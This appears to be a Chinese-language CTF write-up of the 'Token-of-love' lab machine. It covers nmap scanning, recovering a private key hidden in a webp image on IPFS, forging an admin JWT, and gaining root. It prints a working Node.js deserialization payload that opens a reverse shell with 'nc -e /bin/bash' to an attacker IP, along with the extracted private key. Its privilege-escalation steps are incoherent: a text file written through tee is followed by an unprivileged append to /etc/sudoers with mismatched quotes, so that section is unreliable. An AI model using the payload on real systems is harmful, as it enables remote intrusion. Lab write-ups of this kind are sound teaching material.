Token-of-love

靶机说明

• https://thehackerslabs.com/token-of-love/

一、信息收集

1、主机探测

┌──(kali㉿kali)-[~/miao/thl/token-of-love]
└─$ sudo nmap -sn 192.168.2.0/24               
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-18 09:46 CST
Nmap scan report for 192.168.2.1
Host is up (0.00018s latency).
MAC Address: 0A:00:27:00:00:0A (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00026s latency).
MAC Address: 08:00:27:0B:D1:2B (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.20
Host is up (0.0012s latency).
MAC Address: 08:00:27:70:85:D5 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 28.09 seconds

靶机IP：192.168.2.20

2、端口扫描

1.全端口扫描

┌──(kali㉿kali)-[~/miao/thl/token-of-love]
└─$ sudo nmap --min-rate 10000 -p- 192.168.2.20
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-18 09:48 CST
Nmap scan report for 192.168.2.20
Host is up (0.017s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:70:85:D5 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 15.77 seconds

开放端口：22,80

2.详细信息扫描

┌──(kali㉿kali)-[~/miao/thl/token-of-love]
└─$ sudo nmap -sT -sV -O --min-rate 10000 -p22,80 192.168.2.20 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-18 09:50 CST
Nmap scan report for 192.168.2.20
Host is up (0.00069s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u4 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
MAC Address: 08:00:27:70:85:D5 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.30 seconds

1. 22端口：ssh服务，版本为OpenSSH 9.2p1
2. 80端口：http服务，版本为Apache httpd 2.4.62

3.漏洞脚本扫描

┌──(kali㉿kali)-[~/miao/thl/token-of-love]
└─$ sudo nmap --script=vuln -p22,80 192.168.2.20           
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-18 09:51 CST
Nmap scan report for 192.168.2.20
Host is up (0.00076s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.2.20
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.2.20:80/
|     Form id: username
|     Form action: /
|     
|     Path: http://192.168.2.20:80/register
|     Form id: username
|_    Form action: /register
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum: 
|_  /register/: Potentially interesting folder
MAC Address: 08:00:27:70:85:D5 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 64.30 seconds

找到http服务存在目录/register

二、漏洞渗透

1、WEB-80端口渗透

访问页面，是一个登录框

根据找到的/register目录，进行注册登录，成功进入页面

页面提示信息

**administrador** (2025/2/18 10:00:29): Bienvenido. En Token Of Love, la pasión por la ciberseguridad se une al amor digital.
欢迎光临。在《爱的信物》中，对网络安全的热情与数字爱情相遇。

**administrador** (2025/2/18 10:00:29): Dicen que las claves viajan por rutas interplanetarias, vagando por el espacio infinito y estando en todas partes a la vez… ¿será magia o pura tecnología? 😉🔮 bafybeicbqiitqxhqx47qenneilgb2ckdpweoxxkdmcnx4pda654l733lxu
据说钥匙沿着星际路线旅行，在无限的空间中漫游，同时出现在任何地方……这是魔法还是纯粹的技术？ 😉🔮bafybeicbqiitqxhqx47qenneilgb2ckdpweoxxkdmcnx4pda654l733lxu

查看页面源码，找到相关的提示

Busca el conejo hacker amoroso en un mundo interplanetario !
在星际世界中寻找可爱的黑客兔子！
Solo los usuarios admin pueden enviar mensajes
只有管理员用户可以发送消息

1.IPFS渗透

根据上面的提示查找到IPFS，下载安装一个IPFS工具，导入上面的钥匙bafybeicbqiitqxhqx47qenneilgb2ckdpweoxxkdmcnx4pda654l733lxu

进行下载后，查看文件，发现是一个webp文件

┌──(kali㉿kali)-[~/miao/thl/token-of-love]
└─$ file miao      
miao: RIFF (little-endian) data, Web/P image

使用webp文件的图像隐写术工具imgconceal进行检查
https://github.com/tbpaolini/imgconceal

┌──(kali㉿kali)-[~/miao/thl/token-of-love]
└─$ sudo mv miao miao.webp                                    

┌──(kali㉿kali)-[~/miao/thl/token-of-love]
└─$ ./imgconceal --check=miao.webp                                  
Input password for the hidden file (may be blank)
Password: 
Scanning cover image for suitable carrier bits... Done!  
Found file 'private.key':
  hidden on:     Fri Feb 14 01:49:04 2025
  last access:   Fri Feb 14 01:40:31 2025
  last modified: Thu Feb 13 08:38:30 2025
  size: 1.70 KB

The cover image 'miao.webp' can hide approximately more 391.77 KB (after compression of hidden data).

发现里面隐藏着文件private.key

提取隐藏文件private.key

┌──(kali㉿kali)-[~/miao/thl/token-of-love]
└─$ sudo ./imgconceal --extract=miao.webp --no-password --output=private
Scanning cover image for suitable carrier bits... Done!  
SUCCESS: extracted 'private.key' from 'miao.webp'.
  hidden on: Fri Feb 14 01:49:04 2025

成功找到私钥

┌──(kali㉿kali)-[~/miao/thl/token-of-love]
└─$ sudo cat private/private.key
-----BEGIN PRIVATE KEY-----
MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQCq9/ZGu21YSX7c
nJ2E0v2w6adGuMhApMmBSe4DLKGpRAXQZtwy2UslqRZUt1vbefmvBboC9f11cfMb
gWaPturLwYQo/qLf8bNnMQww63MXsFAUmcgf24LSEi+faFr776IR/1+U8U76oSOW
buouGahGGWt74Pwdv/xXmqbZUNxXZOdrxDgixhV/UipWkxnex4GRphFe4KBcT/0i
1qAdgxpgDQbjVj5g+mmceOpSnc1gbsrtsEjgbWSvDEAWplNlRlAiUF0np6PqgpUL
OuxRTMHlj4Gdb7YfHp8Mz6KTgKE1+ko4vusvKq+9UqcgyUHW8VCmWvhFZ6iedRJ0
Ayzm+P1XAgMBAAECggEASm8HMTdDfUcOLNUgvSWw3ndzZNZpFL/JnPjHX2lsfomH
cHp/zsGMtno9pydnHhAmNN1s5QIc1aeFHIoDUXllEs2PENv/pDkSDtCrSpcPdhZE
XxuupbQHahcR1bh0uC/VozlH70v5wyMpn8JtQSHZgZ9qjLXgfcFKhwdlMcLDE2a7
2S5xac3OCQSD6Dak0pwTcnjUiQb43H6sR9d6DY6eMBTrCH+nJdHh3vOathhIzlj7
uDPYc5o5E6Ui6JJmrRt5H4FSAIzati3qw3+eE9hRbYqNJtYnQcxWXSY2HbLX8ooh
LUcAGm23+RSy7cBfdIQUSjWROqk6oE9XZaP6JE3YaQKBgQDegPsKL+6jBH16LKo3
vSm1vVh0aq87yv2zhTPNMctM30hOKzQqfNOt4yJQ5j86hEqMr1iHrgXOMRmxZAHt
Y330s50nva2aV2DekY6KZHk2prUfwMYp+UjAGL5ehRJ3goI5eD+Eo8+NIwk4hecM
kxnaBktuXjvhHaI5VZOTxr57GQKBgQDEtODMSu3OsqtDmQVyMjBiR5W1l8dp9vn3
jRo2uRc2EEKh2rOQxFJy4UYcg8O5Ekp0irD8jr7GGrHgTF+9o3u0k37h8AOZdR94
Yj5UGo3hkYzcSyAmg+5IauLNATXKAkMsF1VwRDLp34PWL3BDcS63LF6f+iSl9vYR
FVNlWoe57wKBgDxqYz/R4gcrmfKJnDKET4YEgrchnLEsnhSXr4gg5CXcXuKywnhi
6otFqDS1QCfgcemfVveIXhUtqd9L22Yc5L+D4cE/tJq67ReiCEU1oOAhBf84NdaB
1KosTcyWb3w52KhIKV8Xp6yX/dH2MdVtP9C+cs7mEXY/uKO+w9KVXXVJAoGAfMSC
BfLM7htz+Dd6NdnRyLTBJ+Ky0Oqf2L4+T1GNgHRF32XaGcv8w/NRxkppfd01LsC9
zCQ6q2tJQg0PeTjWAU7A30ye69pXcMNX537EWbw5jY11QhjSrkplu0S2OoC+3Juc
TM5lQOTOOa/zVEPZLsRM7Mn8Luz7XRCayiHnDy8CgYBsSiu45tsvRRKmMNY4Gxb5
6s2rgGPKbDxmXc4s5xqAqNi6MmFxcZQGkmw8Unzd1QB9HeFGlJGuqIeIj5kRLepL
4mKP3UvXUZGHWIl4MNSoqPh8u1Sq2P4W/K+NOlKTXnmrvldF+VxYaRTdqQ46+h3k
PkDtOtToiExm8jdJZ5lNdw==
-----END PRIVATE KEY-----

从私钥中提权公钥

┌──(kali㉿kali)-[~/miao/thl/token-of-love]
└─$ sudo openssl rsa -in private/private.key -pubout  -out pkcs1.pub
writing RSA key

查看公钥

┌──(kali㉿kali)-[~/miao/thl/token-of-love]
└─$ sudo cat pkcs1.pub                                              
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqvf2RrttWEl+3JydhNL9
sOmnRrjIQKTJgUnuAyyhqUQF0GbcMtlLJakWVLdb23n5rwW6AvX9dXHzG4Fmj7bq
y8GEKP6i3/GzZzEMMOtzF7BQFJnIH9uC0hIvn2ha+++iEf9flPFO+qEjlm7qLhmo
Rhlre+D8Hb/8V5qm2VDcV2Tna8Q4IsYVf1IqVpMZ3seBkaYRXuCgXE/9ItagHYMa
YA0G41Y+YPppnHjqUp3NYG7K7bBI4G1krwxAFqZTZUZQIlBdJ6ej6oKVCzrsUUzB
5Y+BnW+2Hx6fDM+ik4ChNfpKOL7rLyqvvVKnIMlB1vFQplr4RWeonnUSdAMs5vj9
VwIDAQAB
-----END PUBLIC KEY-----

2.逻辑漏洞-JWT

查看登录时所发生的数据包，找到cookie的token，发现是jwt加密

eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MiwidXNlcm5hbWUiOiJtaWFvIiwicm9sZSI6InVzZXIiLCJpYXQiOjE3Mzk4NDQwODksImV4cCI6MTczOTg0NzY4OX0.UEQT7JzngvLbAkWLfq5mi1EQx1d8DTvZhbV1Cn_yydWlGFNdRTQ_KwTyKY_HGNwxqWXLeIB5jLS81ZH65UI9K82m7JrErLeo-UhXft9s6p__3_wajquk-yd0A_-yT-5i-HXlzY3m_CFjBuItNwgTTWP5fzvnOHqHw2ISsxcXlzpx4v-51cRSPOJIiBfcnn71E3yaVevlO5lU6_se2jAY5iHoSddA1_0YV0HsXkOLf49EcAvHW2xddq7VYNIWacWrFBSTZzByTequMkdsn5y945eczfRMLd92I5iXRRFhVIwqwrhcYevou9jmCyp0Q-8mgOiCSOlyYcc0GS7XNmufnA

使用jwt.io对加密内容进行解密

根据找到的公钥和私钥，对admin用户进行编码，得到admin用户的cookie

对cookie进行替换，成功进入admin用户

抓包测试，发送的消息，所获得的数据包需要修改cookie

• 并未执行相关的命令

修改相关的格式，让其报错，发现是nodejs反序列化

群里大佬给的poc

{"data":"{\"text\":\"_$$ND_FUNC$$_function(){require('child_process').exec('nc -e /bin/bash 192.168.2.4 6666', function(error,stdout, stderr) { console.log(stdout) });}( )\"}"}

成功反弹到shell

┌──(kali㉿kali)-[~/miao/thl/token-of-love]
└─$ sudo nc -lvnp 6666                          
listening on [any] 6666 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.20] 37526
id
uid=1000(cupido) gid=1000(cupido) grupos=1000(cupido),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev)

• 获取交换性好的shell

  script /dev/null -c bash
  # 按下 Ctrl+Z 将其挂起
  stty raw -echo; fg
  # 按下回车
  reset xterm
  export TERM=xterm
  export SHELL=/bin/bash
  stty rows 24 columns 80

  找到user.txt

  bash-5.2$ cat /home/cupido/user.txt
  2032f531b474172175d02465b0a4941c

三、权限提升

查看当前用户被允许以sudo权限执行的命令有哪些

bash-5.2$ sudo -l
sudo -l
Matching Defaults entries for cupido on tokenoflove:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty

User cupido may run the following commands on tokenoflove:
    (eros) NOPASSWD: /usr/bin/tee

将字符串 chmod +s /bin/bash写入miao.txt，并赋予suid权限

bash-5.2$ echo 'chmod +s /bin/bash' | sudo -u eros tee /home/eros/miao.txt
chmod +s /bin/bash

将用户 cupido的 sudo权限配置追加到 /etc/sudoers文件中，并且不需要密码

bash -p
bash-5.2$ echo ''cupido ALL=(ALL:ALL) NOPASSWD:ALL' >> /etc/sudoers

获取root权限

bash-5.2$ sudo su -                                                
sudo su -
root@tokenoflove:~# id
id
uid=0(root) gid=0(root) grupos=0(root)

ROOT FLAG

root@tokenoflove:~# cat /root/root.txt
cat /root/root.txt
e0772277e3cdf59b65c6b76df5b84ea6